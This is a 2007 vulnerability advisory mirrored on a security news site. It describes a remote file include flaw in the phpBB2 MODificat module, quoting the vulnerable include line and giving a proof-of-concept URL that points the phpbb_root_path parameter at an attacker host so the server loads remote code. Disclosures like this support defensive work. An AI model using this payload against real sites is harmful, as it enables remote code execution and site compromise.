Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  MyNews 4.2.2 <=  Remote File Include Vulnerability

  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

  PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

  EncapsCMS 0.3.6 (common_foot.
php) Remote File Include

From:x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:30.01.2007
Subject:phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http:
//evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=110366

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server